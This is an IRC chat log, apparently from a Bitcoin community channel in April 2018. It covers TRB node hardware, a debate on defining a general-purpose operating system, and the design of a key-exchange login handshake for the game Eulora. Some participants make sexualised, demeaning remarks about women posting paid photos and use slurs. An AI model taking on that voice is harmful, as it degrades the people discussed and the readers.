b2056c91. you got... half hour. 1800805;1523933104;lobbes; 1800806;1523933106;lobbes;!!v 19B8E1A224D9F9961713C9C89307A28786D3557868D1A7375B01FDE73F96AF9B 1800807;1523933109;deedbot;Invoiced diana_coman 0.00000096 << Auctionbot Service Q1 2018 (http://deedbot.org/deed-516215-2.txt) 1800808;1523933116;lobbes;!!v B527A84AF232D3EE394C008B99EDCAA146781DA718B5E841817E045DB1677ABE 1800809;1523933119;deedbot;Invoiced Birdman 0.00000096 << Auctionbot Service Q1 2018 (http://deedbot.org/deed-516215-1.txt) 1800810;1523933122;lobbes; 1800811;1523934292;esthlos;hanbot et al: my mp-wp seems borked: when trying to make a new post, the "tab" to switch to raw HTML is greyed out and does nothing, and HTML tags are ignored. Also, the visual editing features aren't showing at all. Any ideas? 1800812;1523934344;esthlos;I should add: there's no toolbar to edit text, and nothing is being written to the log 1800813;1523934463;lobbes;esthlos I feel like danielpbarron just resolved a similar issue >> http://btcbase.org/log/2018-04-16#1800429 1800814;1523934463;a111;Logged on 2018-04-16 20:24 danielpbarron: right now i'm trying to figure out why the pretty urls thing broke my edit-post thing to where the handy "insert link/blockquote" buttons disappeared 1800815;1523934540;ascii_lander;http://btcbase.org/log/2018-04-17#1800708 << the stock disk is 128GB, lobbes , toosmall for trb 1800816;1523934540;a111;Logged on 2018-04-17 01:12 lobbes: I'm probably too poor, but if it is in my range I'll most likely try and grab one for trb-ing 1800817;1523934732;ckang;!!up kendraB 1800818;1523934732;deedbot;kendraB voiced for 30 minutes. 1800819;1523934741;ckang;she couldnt figure out how to upload 1800820;1523934769;esthlos;lobbes: excellent, thank you 1800821;1523934771;kendraB;https://usercontent.irccloud-cdn.com/file/rP3sQcWi/image.jpg 1800822;1523934811;ckang;!!up veronicalol 1800823;1523934812;deedbot;veronicalol voiced for 30 minutes. 1800824;1523935000;lobbes;ascii_lander: ah damn. ty for info 1800825;1523935172;ascii_lander;once we can get moar ssd over here, will start to offer options 1800826;1523935207;ascii_lander;but 1) rockchip will prolly never be an idea trb box 2) wakeup folx installing 77th trb in the rack ! trb dun do much good with N nodez hanging off 1 fiber. 1800827;1523935209;trinque;so... how did the tattoo end up one direction, and the numbers the other? 1800828;1523935233;trinque;kendraB: ^ 1800829;1523935241;kendraB;what do you mean ? 1800830;1523935252;kendraB;I wrote around the tattoo 1800831;1523935263;mircea_popescu;!!pay kendraB 0.02 1800832;1523935268;deedbot;Get your OTP: http://p.bvulpes.com/pastes/eE11m/?raw=true 1800833;1523935281;mircea_popescu;veronicalol, 4632a32e. 1800834;1523935297;mircea_popescu;lobbes, ascii_lander the blockchain isn't even 50gb yet. so it'll work for years. 1800835;1523935305;trinque;kendraB: I mean your tattoo's lettering goes one way, and your writing the other way. 1800836;1523935311;ascii_lander;mircea_popescu: indices 1800837;1523935326;ascii_lander;mircea_popescu: srsly log in to yer node and size it up, du -h .bitcoin 1800838;1523935415;ascii_lander;as for only the bloxx -- mine weigh 150+G 1800839;1523935438;mircea_popescu;darn i was a degree of magnitude off 1800840;1523935439;ascii_lander;217G total mass of the dir. 1800841;1523935442;mircea_popescu;soz. 1800842;1523935489;mircea_popescu;trinque, im guessing it's in a mirror ? 1800843;1523935519;lobbes;well, she'd have had to write either the string or have had the tattoo mirrored when creating 1800844;1523935545;lobbes;i.e. lettering mirrored on one but not the other 1800845;1523935563;kendraB;tattoo is such it can be read in a mirror 1800846;1523935588;lobbes;aha 1800847;1523935588;trinque;weird. 1800848;1523935618;lobbes;ascii_lander: agreed on 1) and 2), but still, as a secondary node may as well have one than not eh? 1800849;1523935664;lobbes;my aim is to have > 1 trb node in > 1 physical locations 1800850;1523935665;mircea_popescu;nah, rox notrly useful for this application. 1800851;1523935684;ascii_lander;lobbes: iirc current trb won't even ever simult-connect to 2+ nodes nearby in ip space 1800852;1523935694;ascii_lander;mircea_popescu: yea verily, this is possibly the 1 commonplace thing where they definitely won't shine 1800853;1523935710;ascii_lander;trb lives and dies by i/o bw 1800854;1523935728;ascii_lander;and this box has late'90s-era i/o bw. 1800855;1523935762;trinque;that's too bad about not connecting to nearby nodes 1800856;1523935775;*;trinque will have a synced node in there before long 1800857;1523935788;trinque;ascii_lander: not even with -connect ? 1800858;1523935794;mircea_popescu;trinque, im not even sure it's so bad. spreads the load. 1800859;1523935795;ascii_lander;trinque: iirc not 1800860;1523935807;ascii_lander;it was prolly an anti-sibyl measure originally 1800861;1523935815;mircea_popescu;think about it, if 500 nodes want to talk to bbistan, each local trb will talk to 500/n 1800862;1523935854;trinque;I just mean for initial stand-up of somebody's node 1800863;1523935869;mircea_popescu;so they just pick one local node. 1800864;1523935870;trinque;makes sense to spread out connections normally, totally. 1800865;1523935906;mircea_popescu;not what i mean. here it is : if you have n nodes in ip a.b.c.*, each node from outside will pick ONE a.b.c.* node to talk to. 1800866;1523935937;mircea_popescu;resulting in this situation where if a large k nodes wnat to talk to the n group, each node in the n group will see k/n inbound connections on average. 1800867;1523935953;mircea_popescu;so adding more nodes in bbistan helps, somewhat. it doesn't help the pipe, but it spreads the load among boxes. 1800868;1523935956;ascii_lander;current trb (not speaking of my 'wires' attempt) doesn't give you this behaviour 1800869;1523935962;mircea_popescu;how not ? 1800870;1523935975;ascii_lander;if a node it tried to connect to, failed to answer, iirc it skips to a random node from the cache 1800871;1523935981;mircea_popescu;sure. 1800872;1523935982;ascii_lander;which is overwhelimingly heathen 1800873;1523935995;mircea_popescu;the only guarantee is you won't have outside node talking to 2 locals. 1800874;1523936001;ascii_lander;there is not , in traditional trb, a 'talk to these N nodes' mode. 1800875;1523936018;ascii_lander;('-connect' doesn't do quite this; it makes own node a slave-only) 1800876;1523936041;mircea_popescu;admitting ad absurdum that there's a large number of nodes only knowing this set of peers. 1800877;1523936042;ascii_lander;mircea_popescu: right 1800878;1523936062;ascii_lander;mircea_popescu: aha, then would 1800879;1523936109;veronicalol;https://usercontent.irccloud-cdn.com/file/SR5eeu5Z/image.jpg 1800880;1523936425;ckang;!!up driscole 1800881;1523936426;deedbot;driscole voiced for 30 minutes. 1800882;1523936431;ckang;another for you mircea_popescu 1800883;1523936585;trinque;kendraB: so when you were getting this tattoo, how it looked in a mirror took precedence over how it... looked as you stand there? 1800884;1523936624;ckang;trinque: ive know several ppl to do that 1800885;1523936624;ckang;known* 1800886;1523936625;ckang;the reason is who sees a tattoo the most 1800887;1523936630;ckang;you do, in the mirror 1800888;1523936665;ckang;why would you want to read a tattoo every time you get out of the shower backwards 1800889;1523936693;ckang;if its on your arm however thats a bit different... 1800890;1523936740;trinque;heh, even the crackwhore's "bobby" was the right direction 1800891;1523936786;ckang;i imagine thats so "bobby" can read it 1800892;1523936903;ascii_lander;http://btcbase.org/log/2018-04-16#1800393 << augustine 1800893;1523936903;a111;Logged on 2018-04-16 20:03 mircea_popescu: you know, "show me the light, by all means, but later" 1800894;1523936903;ben_vulpes;ckang: mirroring tattoos on self turns the narcicissm to eleven 1800895;1523936923;ckang;ben_vulpes: im not trying to justify it, but ive seen it before 1800896;1523936942;ckang;im not a huge fan of tats, they look bad with time 1800897;1523937000;ckang;but its mostly been little short things like 'stay strong' or some personal reminder 1800898;1523937146;trinque;that bobby pic (with presumably ex-dood's hand in frame) is fanfic-worthy 1800899;1523937345;ckang;so what brave man is going to sample her warez? 1800900;1523937689;*;ascii_lander bbl:bed 1800901;1523944109;trinque;looks like there's packet loss between the wallet and deedbot, with the fault on the deedbot end. 1800902;1523944143;trinque;that'd explain some of the incomplete registrations (got nick:fp pair, did not get key into wallet's keychain) 1800903;1523944188;*;trinque shipped a patch that'll retry fetching the key 1800904;1523944244;trinque;aside all that, deedbot's obviously migrating to pizarro soon as can be done. 1800905;1523948759;ckang;trinque: do they need to register ? 1800906;1523948769;ckang;re-register* 1800907;1523955388;spyked;http://btcbase.org/log/2018-04-16#1799857 <-- which one(s)? ti-89? trying to get a better idea about how "os with clean no-assumption interface" looks. 1800908;1523955388;a111;Logged on 2018-04-16 15:20 mircea_popescu: the best example i can think of is the code on the old handheld calculators. THAT is a general purpose os : it makes no assumption about the downstream, merely fully, cleanly and directly exposes the hardware. 1800909;1523955445;spyked;hm, a111 dead? 1800910;1523955479;spyked;http://logs.bvulpes.com/trilema?d=2018-4-16#335636 <-- precisely! 1800911;1523955482;mimisbrunnr;Logged on 2018-04-16 15:12 mircea_popescu: i suppose at work might be a confusion between what-some-idiots-might-be-thinking-retroconstructed-on-the-flimsy-basis-of-how-they-behave, where "general purpose os" means "the sprinkle of magic turning the computer from a computer to anything i want it to be, which is to say a tool that magicvally works for any purpose i might come up with, especially the nonsensical and self-contradic 1800912;1523955905;spyked;http://btcbase.org/log/2018-04-16#1799861 <-- I dun fully grasp this, so bear with me for a moment. suppose the following (imho no-nonsense) thought experiment: say we have an os, NOP-OS, that works as follows: after initialization, the os loads a (user-provided) program P; the NOP-OS interface exposes to P exactly one system call, "no-op", which does nothing and returns. is then NOP-OS a general-purpose OS? say we add another system 1800913;1523955905;a111;Logged on 2018-04-16 15:22 mircea_popescu: whereas the proper definition of "general purpose" is the one mentioned, "which makes no assumptions about the userland". 1800914;1523955911;spyked;call, "exit(code)", which allows P to return control to NOP-OS, so that the user can load another program P'. same question here. 1800915;1523962662;shinohai;http://archive.is/SoN4j <<< be careful out there, trinque 1800916;1523971370;BingoBoingo;So much log from yesterday 1800917;1523971650;BingoBoingo;asciilifeform's sense of wonder here has been good for the moral. Been learning quite a bit here. 1800918;1523972875;deedbot;http://qntra.net/2018/04/jewish-state-continues-aggressions-in-syria/ << Qntra - Jewish State Continues Aggressions In Syria 1800919;1523973578;shinohai;http://btcbase.org/log/2018-04-17#1800713 <<< ty mod6 ... had a fine weekend o7 1800920;1523973578;a111;Logged on 2018-04-17 01:26 mod6: shinohai: happy belated! 1800921;1523973590;deedbot;http://www.dianacoman.com/2018/04/17/rfc-euloras-communication-protocol-eucomms/ << Ossasepia - RFC: Euloras Communication Protocol (EuComms) 1800922;1523974171;deedbot;http://qntra.net/2018/04/21-coearn-com-saga-ends-with-coinbase-acquisition/ << Qntra - 21.co/Earn.com Saga Ends With Coinbase Acquisition 1800923;1523974788;shinohai;BingoBoingo: overvalues firm / overvalues the firm ? 1800924;1523974804;BingoBoingo;ty shinohai 1800925;1523974806;BingoBoingo;fxd 1800926;1523976843;ascii_lander;ohai mircea_popescu 1800927;1523976978;mod6;mornin' TMSR~ 1800928;1523976982;mircea_popescu;heya. 1800929;1523976991;BingoBoingo;Buen dia 1800930;1523977010;mircea_popescu;!!pay veronicalol 0.02 1800931;1523977017;deedbot;Get your OTP: http://p.bvulpes.com/pastes/I3o2X/?raw=true 1800932;1523977099;mircea_popescu;http://btcbase.org/log/2018-04-17#1800892 << my apocripha says aquinas. 1800933;1523977099;a111;Logged on 2018-04-17 03:48 ascii_lander: http://btcbase.org/log/2018-04-16#1800393 << augustine 1800934;1523977130;BingoBoingo;Fuck it, Plotinus 1800935;1523977165;ascii_lander;mircea_popescu: it's in my copy of augustine, lol 1800936;1523977188;ascii_lander;iirc 'make me chaste and continent but not yet' 1800937;1523977232;mircea_popescu;http://btcbase.org/log/2018-04-17#1800909 << wasn't, no. and yes, the ti-89, sure. or my ancient citizen solar powered item which i haven't seen for 15 years at the least but which was revolutionary for its time and literally worked by degrees -- if you obstructed two of its cell it could still slightly power the screen so it did. 1800938;1523977232;a111;Logged on 2018-04-17 08:57 spyked: hm, a111 dead? 1800939;1523977255;mircea_popescu;ascii_lander, to a large degree who said what in early church history is a cockularity poontest. 1800940;1523977258;mircea_popescu;or vice-verssa 1800941;1523977269;mircea_popescu;lobbes, ^ see that ? SEE THAT ? 1800942;1523977274;mircea_popescu;you will roux the day! 1800943;1523977298;ascii_lander;these 'earlies' are ~1000yr apart eh 1800944;1523977314;mircea_popescu;from you you mean ? or from each other ? 1800945;1523977318;ascii_lander;eachother 1800946;1523977333;mircea_popescu;so what's that mean, that they were both riding dinosaurs into combat, big deal. 1800947;1523977497;mircea_popescu;http://btcbase.org/log/2018-04-17#1800912 << this item is not an os at all, if it runs on a machine which is capable, hardware-wise, of more than a no-op. 1800948;1523977497;a111;Logged on 2018-04-17 09:05 spyked: http://btcbase.org/log/2018-04-16#1799861 <-- I dun fully grasp this, so bear with me for a moment. suppose the following (imho no-nonsense) thought experiment: say we have an os, NOP-OS, that works as follows: after initialization, the os loads a (user-provided) program P; the NOP-OS interface exposes to P exactly one system call, "no-op", which does nothing and returns. is then NOP-OS a general-purpose OS? say we add another system 1800949;1523977511;mircea_popescu;if however that os runs on a no-op single instruction cpu, then it is absolutely general purpose. 1800950;1523977541;mircea_popescu;if you modified it so it checked whether the machine temperature is within three degrees of freezing and did not expose the no-op in THAT case, then thereby it would be a general purpose os no longer 1800951;1523977559;mircea_popescu;but instead, it would be a particular-purpose os, "for those cases when the user wants the machine to not be 3 degrees from freezing". 1800952;1523977711;mircea_popescu;http://btcbase.org/log/2018-04-17#1800914 <<< how it manages user interfacing is not even a consideration here. whether it returns control via pushing that specific-sounding button on the back left like the old tim-s ; or whether it has a software call implemented is irrelevant. not from a gui/ux perspoective, of course, but this is the fucking point of systems design as a discipline : that it does NOT consider other discipl 1800953;1523977711;a111;Logged on 2018-04-17 09:05 spyked: call, "exit(code)", which allows P to return control to NOP-OS, so that the user can load another program P'. same question here. 1800954;1523977711;mircea_popescu;ines, and through this separation allows complex, YET STILL SENSIBLE apparata be aggregated. 1800955;1523977743;mircea_popescu;exactly how medicine does not consider whether you were fashionably dressed at the moment of symptoms, to establish whether your sartorial ineptitude maybe upset Sartrus, the god of suits. 1800956;1523977780;mircea_popescu;god knows i have enough trouble as it is remembering what i ate yesterday, if i also had to remember what i was wearing while doing it we could just call it quits. 1800957;1523977839;mircea_popescu;which is exactly what's happening with pre-republican computers. 1800958;1523978098;mircea_popescu;(fun facts for the recently born : 1. most old zx-80 clone programs were games, whether you count by titles, or by total cpu time, or any other way ; 2. they did not return (mostly because to make a good one you had to fuck the kernel space, that zx80 shit was tight), you pressed the reset button to load the next item on the tape. 1800959;1523978261;mircea_popescu;the jury is still out, as far as i'm concerned, on whether the os that loses control of a machine is still an os, meaning it's not altogether clear to me the basic-whatever combo they had at the time actually constitutes an os. but the problem FUCKING ISNT the naive perception at the time, "oh, it didn't hjave icons to click like windows 3.1". windows 3.1 was not an os ; nor was any other windows product an os. microsoft ship 1800960;1523978261;mircea_popescu;ped a "userland package" at all points in its existence, there's no substantial difference between "the office suite" and "windows + the office suite". 1800961;1523978295;trinque;going to reboot the deedbot box; getting about 10kbps out of the thing currently. 1800962;1523978309;trinque;kind of a wonder it's working at all under these conditions 1800963;1523978340;ascii_lander;trinque: out of curiosity -- this is in a heathen dc ? usa ? 1800964;1523978348;trinque;singapore, actually 1800965;1523978389;mircea_popescu;http://qntra.net/2018/04/21-coearn-com-saga-ends-with-coinbase-acquisition/ << aka 'usg.coinbase is the usg-designated bagholder in the space, it'll "buy" all the failed attempts of all usg agencies so the empire of idiots can "save face".' 1800966;1523978436;mircea_popescu;http://www.dianacoman.com/2018/04/17/rfc-euloras-communication-protocol-eucomms/ << hey phf, i intend to comission you to write a text-only eulora client on this basis, give a looksee ? an' let me know ? 1800967;1523978452;mircea_popescu;then either phf or someone else can turn that text-only client into a webservice. 1800968;1523978479;mircea_popescu;slash ircbot. 1800969;1523978527;mircea_popescu;ben_vulpes, sooo, did you send login details to douchebag ? what do these cost in the end ? 1800970;1523978533;mircea_popescu;ascii_lander, mg box ? 1800971;1523978554;ascii_lander;mircea_popescu: i'ma actually headed to the smg box shortly 1800972;1523978563;ascii_lander;(coffee, then to dc) 1800973;1523978591;mircea_popescu;aite. 1800974;1523978605;ascii_lander;will reconnect from inside the cage. 1800975;1523978615;BingoBoingo; aite. << I have been walking alf quite a bit here 1800976;1523978632;mircea_popescu;it's good for him. 1800977;1523978662;mircea_popescu;alf the beedog happines = long walks + icecream stops. 1800978;1523978705;BingoBoingo;Until alf arrived I had been taking the cheese versus petrocheese gulf for granted 1800979;1523978724;mircea_popescu;howssat ? 1800980;1523978742;BingoBoingo;I just kinda forgot petrocheese was a thing with the real stuff here 1800981;1523978854;mircea_popescu;oh lol 1800982;1523978875;mircea_popescu;makes two of us. 1800983;1523979087;ascii_lander;i dun even eat petrocheese back home 1800984;1523979096;ascii_lander;but this is at the cost of 'hey i'ma eat a video card' 1800985;1523979103;ascii_lander;whereas here.. 1800986;1523979130;BingoBoingo;lol 1800987;1523979149;*;ascii_lander finally dressed and now will march out. 1800988;1523979295;trinque;ckang: no, I'll have the deedbot keys pulled down in an hour; they'll then be able to withdraw, whoever can't 1800989;1523979335;trinque;heh that guy the other day might've mentioned he was getting kbps!!! 1800990;1523979358;mircea_popescu;but that'd have been revealing his hand. 1800991;1523979393;mircea_popescu;you don't understand the game of world politics and international intrigue of the web! you're supposed to not tell things! THERES TERRORISTS OUT THERE. 1800992;1523979411;trinque;ah shit, with scary beards even 1800993;1523979422;mircea_popescu;yes. gotta keep your tits close to the chest and the sharpie firmly up butt. 1800994;1523979434;trinque;lol 1800995;1523979456;mircea_popescu;in other news, we're up to 55 titbitpairs 1800996;1523979470;douchebag;haha 1800997;1523980292;trinque;aaaand 10-12% packet loss inside the dc 1800998;1523980410;trinque;the singapore one of course, not pizarro. 1800999;1523981122;spyked;http://btcbase.org/log/2018-04-17#1800947 <-- I deliberately left the "underneath the OS" bit out because it was not explicitly mentioned in the definition. but yes, in my question I was looking for "specificity", same that's mentioned in http://thetarpit.org/posts/y04/06d-what-is-an-os.html#selection-179.0-179.238 1801000;1523981122;a111;Logged on 2018-04-17 15:04 mircea_popescu: http://btcbase.org/log/2018-04-17#1800912 << this item is not an os at all, if it runs on a machine which is capable, hardware-wise, of more than a no-op. 1801001;1523981181;spyked;so, taking anotehr shot at this definition: a general-purpose os is an os that cleanly exposes hardware to user programs, without making assumptions about the latter. it's still not immediately clear to me what "cleanly" means, but this'll have to do. 1801002;1523981265;spyked;anyway, this thread put together should make for a decent follow-up piece, i'ma get to it tomorrow. 1801003;1523981485;spyked;http://btcbase.org/log/2018-04-17#1800949 <-- could also be a turing-capable cpu that exposes the instructions natively after the program is loaded. the important part was re what the os itself exposes (or not, in this case) and how this relates to "makes no assumptions about P" 1801004;1523981485;a111;Logged on 2018-04-17 15:05 mircea_popescu: if however that os runs on a no-op single instruction cpu, then it is absolutely general purpose. 1801005;1523981501;mircea_popescu;trinque, someone threw a helluva party. 1801006;1523981550;mircea_popescu;spyked, cleanly ie, simplest bijective. 1. all items in A are represented in B ; 2. all items in B have an underlying in A ; 3. there is no simpler relation in any case. 1801007;1523981622;mircea_popescu;spyked, perhaps another useful heuristic is the authority problem. if the specification of a user program CAN include a MUST statement, quo warranto ? if "the os", then it is not general purpose. 1801008;1523981740;mircea_popescu;and perhaps worthy of noting here, that the "trend" "emerging" from usg's own "computer security" roadside act cum flea circus, is towards special-purpose os. because that's what they mean by "security". 1801009;1523981789;mircea_popescu;whereas the one user one box tmsr approach sticks with the general purpose os philosophy, and expects spurious color-of-bits considerations to be implemented in the realm in which they belong -- if you want to own the bits own the box, there shall be no legislating here. 1801010;1523982230;spyked;mircea_popescu, I don't see a fundamental problem with special-purpose os (which is why I mentioned "bitcoin node os" as one, though it *could* in principle be implemented as a particular instance of a general-purpose os). embedded hardware (e.g. requiring timing constriants) is full of them. 1801011;1523982245;spyked;*constraints 1801012;1523982517;mircea_popescu;it all comes down to WHAT is the special purpose. mind that the direction the bitcoin node os is taking is towards ~special purpose hardware~. this is very fucking different, whether you have special purpose hardware run by general purpose osen, or whether you have ibm at clone consumershit emulated into republican sanity by usg's flaour of special purpose os. 1801013;1523982538;mircea_popescu;because in the former case, the VARIOUS gposen would still be in fact different from each other. 1801014;1523982661;mircea_popescu;the confounding factor here is pantsuitist outlook, whereby some retard (the user) regards self as meausre of all things and imagines all vectors start from him, and therefore in his boneheaded approach to the world, "general purpose os" means something about him. it fucking doesn't, a general purpose os isn't one joe schcmucktoe can put on a stick and carry around and "it'll work on all computers he encounters". 1801015;1523982712;mircea_popescu;ye olde sld-7001 (check me out, meanwhile i found it!)'s os is GP, notwithstanding it won't run your "intelligent" lawnmower. 1801016;1523982791;*;spyked looks 1801017;1523982843;mircea_popescu;so fucking old, citizen itself no longer lists it. 1801018;1523983123;spyked;aha, found nothing on hardware and software specs. mircea_popescu, if it's any similar to the calculators I had as a kid, it might not even have any software (all calculator logic implemented using gates) 1801019;1523983145;mircea_popescu;soooo ? 1801020;1523983158;mircea_popescu;what, your no-op example is not trivial, but my no-os example is ? 1801021;1523983174;mircea_popescu;0-lenght os can still be gp. 1801022;1523983175;spyked;well, I didn't say it *doesn't* have an OS. just trying to figure out what that is :D 1801023;1523983179;mircea_popescu;:p 1801024;1523983183;mircea_popescu;i don't expect it was anything. 1801025;1523983221;mircea_popescu;in fact, 0-length os is guaranteed gp. 1801026;1523983779;mircea_popescu;diana_coman, this is too fluid to fix in a comment, and i'd rather have it here than in #eulora. so : let's call eucrypt.serpent X and eucrypt.RSA-OAEP R. now, 1. client wants to log in, R(hello) -> S[erver]. 1801027;1523983833;mircea_popescu;at this juncture, server knows "someone" claiming to be A initiated a connection. it should therefore send X(answer) back, where X uses a key that S knows A should have, on the basis of previous comms. 1801028;1523983885;mircea_popescu;if A fails to respond, S will close the connection, practically meaning that A can't claim to be A unless he keeps some X keys about. which is something A-implementers must be aware of. 1801029;1523983963;mircea_popescu;now, if B wants to update his X.keys with the server, he sends them X'd with one of the existing S keys. meaning, again, that if B manages to lose all S's X keys, it lost the account. 1801030;1523983987;mircea_popescu;so implementations MUST keep at least a local and a server X key at all times ; doing otherwise is === deleting the account. 1801031;1523984067;mircea_popescu;this is then the eulora future login handshake : C : hello ; S : new account, here are your keys ; C : here's some keys of mine. they can now continue indefinitely, just as long as nobody loses all the keys. 1801032;1523984269;mircea_popescu;actually, let's make this clearer, it's ambiguous as it stands. C : hello ; S : new account, here are some X keys you can use to decrypt and some X keys you're required to use to encrypt ; C : here's my R key [and here are some X keys i'd prefer to use]. 1801033;1523984431;mircea_popescu;which then runs into the obvious problem that i had been chasing all this time : client's R key has to come earlier in the flux. how about the rule that all hello items sent to the server are either a) encrypted to a pre-existing X key or else b) contain a R key ? ie, our helo is not correct as specced. 1801034;1523984850;mircea_popescu;if instead we made it rely on R, there'd be great benefits. consider this alternate model : C : R(hi, this is C.R.key) S : R(here's some X keys for me and for you) C:(actually i'd rather you use these X keys for me). 1801035;1523984895;mircea_popescu;like this, server must not lose its R privkey and clients must not lose their R privkey , but pubkeys of all these can be safely lost, and X keys don't matter at all. seems altogether safer and less friable. 1801036;1523985144;mircea_popescu;now subsidiary for all this : server should generate a batch of X keys and send them to the client every time its store of either S or C X keys drops under a certain value. it's therefore the client responsibility to make sure there's enough keys in store if it doesn't want to pay for key generation. now, what should this threshold be ? 3 ? 1801037;1523985181;mircea_popescu;also important, third question : should the client be permitted to generate X keys for the server ? 1801038;1523985575;*;ascii_lander reporting live from... inside the cage. fixed the raid oops on smg box; nao partitioning it & copying dulap's gentoo 1801039;1523985678;mircea_popescu;win. 1801040;1523986084;mircea_popescu;now here's a question on which i'd very much like to hear a lordship oppinion. so, the model currently contemplated for eulora includes a bit whereby the server has to be told by the client a magic string, and will report this back to the client on demand, "here's what you told me you are". the idea is that the client can then sha his binary, and see if the strings match. 1801041;1523986165;mircea_popescu;the reason for this is that games are eminently a domain where people share binaries, a matter of fact established both from general and minigame's own experience. obviously in the sane world of source sharing, v is the correct solution. but if people are going to share binaries, this seems like the only available approach. 1801042;1523986295;mircea_popescu;(one could object, "it's pointless to attempt this, hacked client can just replace magic string", which is true, but nevertheless client can still binary audit his item and see / login with a special, known-good string-test-only client and see what he should be. ie, client can bootstrap himself out of the fakebox produced by a hacked binary. 1801043;1523986354;mircea_popescu;now obviously, this approach wouldn't be nearly as useful for dynamically linked clients ; but i deem the fact that it puts the security incentive on dumping dynamic linking a very good thing. 1801044;1523986356;mircea_popescu;so... thoughts ? 1801045;1523986394;mircea_popescu;!!getratings deedbot 1801046;1523986403;mircea_popescu;!!help 1801047;1523986403;deedbot;http://deedbot.org/help.html 1801048;1523986435;mircea_popescu;!!ratings deedbot 1801049;1523986436;deedbot;http://p.bvulpes.com/pastes/ShmBc/?raw=true 1801050;1523986470;diana_coman;http://btcbase.org/log/2018-04-17#1801027 --> uhm, for starters this is not correct; initial hello is meant for....initial, no "previous comms" wtf; server needs to reply not with X(answer) but with R(answer) and yes, it needs to know the public rsa key of the account; the creation of accts is still a bit in the air as server needs to get somehow the public key 1801051;1523986470;a111;Logged on 2018-04-17 16:50 mircea_popescu: at this juncture, server knows "someone" claiming to be A initiated a connection. it should therefore send X(answer) back, where X uses a key that S knows A should have, on the basis of previous comms. 1801052;1523986500;mircea_popescu;diana_coman, well, two kinds of helo, yes ? when initiating a connection ; and when initaitng an account. 1801053;1523986506;diana_coman;the idea was that if client loses all his X keys, he can send a hello message again 1801054;1523986509;diana_coman;uhm, no 1801055;1523986547;diana_coman;ah, you mean the same but just id vs no id? 1801056;1523986554;mircea_popescu;basically. 1801057;1523986568;mircea_popescu;that's what i mean, this is kinda too fluid and i suspect it's because somewhere in my head i conflate two things. 1801058;1523986641;diana_coman;it does seem like you have something else in mind indeed; hm 1801059;1523986677;diana_coman;possibly the "register account" vs "authenticate" 1801060;1523986703;mircea_popescu;diana_coman, in any case strictly speaking, the helo as we spec it does not include R pubkey ; whereas in practice it actually must. but read the whole blob, this is better compiled htan parsed. 1801061;1523986720;*;diana_coman reads 1801062;1523986945;diana_coman;I don't quite follow why is server concerned with client's stock of R keys? client can request new keys, burn them, do whatever it wants as it decides how often it wants new keys 1801063;1523986950;diana_coman;why is this server's concern? 1801064;1523986986;mircea_popescu;X keys only ; R key is one. and server is concerned because if it has no client X keys, it can't send, and if the client has no server X keys, the server can't receive. 1801065;1523986996;diana_coman;ugh, meant X there 1801066;1523987016;diana_coman;I don't quite follow why is server concerned with client's stock of X keys? client can request new keys, burn them, do whatever it wants as it decides how often it wants new keys 1801067;1523987017;mircea_popescu;but basically the idea for X keys is to work like that, if you don't have any server makes, if you make them then server uses . 1801068;1523987067;diana_coman;but if you don't know that you don't have... 1801069;1523987089;mircea_popescu;how could the server not know ? 1801070;1523987104;diana_coman;but why does the server *care*? to spare the client the need to ask or what? 1801071;1523987110;mircea_popescu;yes. 1801072;1523987114;diana_coman;why? 1801073;1523987132;mircea_popescu;because it's stuck keeping a list of keys anyway. so it knows how many they are anyway. so might as well send when needed rather than wait to be asked. 1801074;1523987146;diana_coman;so server sets threshold at 3; why can't I decide I want that at 2 and you at 5 and so on 1801075;1523987163;mircea_popescu;you can send as many as you want, the server will keep them for you. 1801076;1523987176;diana_coman;this was lower threshold, lol 1801077;1523987177;mircea_popescu;but if you want less than 3, it'll keep sending you extras until you give up trying to argue with my server. 1801078;1523987186;diana_coman;yes, but...why 1801079;1523987195;mircea_popescu;hm 1801080;1523987208;mircea_popescu;so no X key thresholds ? 1801081;1523987267;diana_coman;server wants to look after clients so they don't end up without keys; it can, sure; all I'm saying is that I don't quite see the reason for this; perhaps other than "clients are idiots, let's at least avoid the case where they end up going hello hello all the time" 1801082;1523987303;mircea_popescu;seems to me the threshold will practically be set at 1 as a matter of absolute necessity. once that is the case, setting it at 3 is in no substantial way different : just as many keys will be used as before, but the setting at 3 forces key creation at a time prior to when keys are needed, which seems to help with resource load spread. 1801083;1523987331;mircea_popescu;diana_coman, kinda 90% of all server code aims to avoid "accidental client ddos". 1801084;1523987339;diana_coman;that makes more sense, yes 1801085;1523987376;mircea_popescu;i don't have this modelled well enough to say it with certainty ; but it seems to me 3 is a reasonable choice. 1801086;1523987395;diana_coman;well, it's certainly not the number I have a problem with anyway 1801087;1523987405;mircea_popescu;but you agree it can never be lower than 1 ? 1801088;1523987446;diana_coman;I'm still not convinced it has to be; if it gets lower than 1 and client hasn't asked, I'd just disconnect them and they can get back with a hello that is low priority and they..w.ait 1801089;1523987449;diana_coman;no ddos anywa 1801090;1523987481;mircea_popescu;yes, but here's the principle : if server knows something will be needed as a certainty, server should act rather than wait to be called to act. which is why it's a server rather than a client. 1801091;1523987535;diana_coman;uhm, dunno about that certainty there; maybe client doesn't want to keep serpent keys between sessions for all I know 1801092;1523987564;mircea_popescu;that's a usestyle we discourage anyway. 1801093;1523987634;mircea_popescu;(for the oursiders : it is the agreement in minigame boardroom that rsa helo packets from existing clients will be lowest priority, after 1. serpent packets and 2. rsa helo packets from unknown clients. the idea is you keep your serpent keys, and continue your "session" whenever, it's kind of a stateless session)\ 1801094;1523987688;diana_coman;re creating account: it obviously needs the client's public rsa and atm that one is nowhere in there, yes; I thought you didn't want them in there because it's not just about "a rsa key" but rather one registered with deedbot sort of thing 1801095;1523987698;diana_coman;so it's not enough that client plonks a key in there 1801096;1523987701;mircea_popescu;(it does away with the "is user logged in". you can pm everyone all the time, they're always logged in anyway). 1801097;1523987733;mircea_popescu;diana_coman, one consideration was that if it includes pubkey it will have to be multipacket and i wanted it to be singlepacket for some now incomprehensible reason. 1801098;1523987779;mircea_popescu;but no, seems the correct approach is to replace 3.1.5 with "rsa pubkey". and ACTUALLY use that as the account id. 1801099;1523987827;diana_coman;rsa pubkey if de-facto account id anyway i.e. identifies uniquely one account, yes 1801100;1523987835;diana_coman;if* -> is 1801101;1523987871;mircea_popescu;yeah. it's the only sane identifier to be had. 1801102;1523987884;diana_coman;but to my earlier obs: so you're fine with people creating account with any rsa key (well, tmsr/eucrypt rsa at least) ? 1801103;1523987891;mircea_popescu;yes. 1801104;1523987925;mircea_popescu;i know this isn't how it works now and hasn't been for a long time, but i'm ready to move on!!1 1801105;1523987986;diana_coman;ok, so then there is hello-new-account with the R public key; there are otherwise *only* X messages? and 